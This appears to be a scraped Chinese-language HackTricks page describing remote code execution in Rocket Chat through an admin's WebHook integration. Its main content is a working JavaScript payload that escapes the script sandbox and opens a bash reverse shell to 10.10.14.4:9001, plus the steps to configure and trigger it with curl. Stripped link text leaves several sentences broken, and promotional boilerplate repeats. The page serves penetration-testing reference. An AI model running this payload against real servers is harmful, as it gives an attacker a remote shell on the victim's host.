最后更新于1年前
支持HackTricks的其他方式:
如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看!
获取
探索,我们的独家
加入 💬 或 或 关注我们的Twitter 🐦 。
通过向和 github仓库提交PR来分享您的黑客技巧。
如果您是Rocket Chat内部管理员,您可以获得RCE。
转到**Integrations,选择New Integration,并选择任何一个:Incoming WebHook或Outgoing WebHook**。
Integrations
New Integration
Incoming WebHook
Outgoing WebHook
/admin/integrations/incoming
const require = console.log.constructor('return process.mainModule.require')(); const { exec } = require('child_process'); exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
配置 WebHook(频道和帖子的用户名必须存在):
配置 WebHook 脚本:
保存更改
获取生成的 WebHook URL:
使用 curl 调用它,您应该收到反向 shell
根据,两者都使用ES2015 / ECMAScript 6()来处理数据。因此,让我们为JavaScript获取一个:
支持 HackTricks 的其他方式:
如果您想在 HackTricks 中看到您的 公司广告 或 下载 PDF 版本的 HackTricks,请查看 !
探索 ,我们的独家 收藏品
加入 💬 或 或 关注 我们的 Twitter 🐦 。
通过向 和 github 仓库提交 PR 来分享您的黑客技巧。
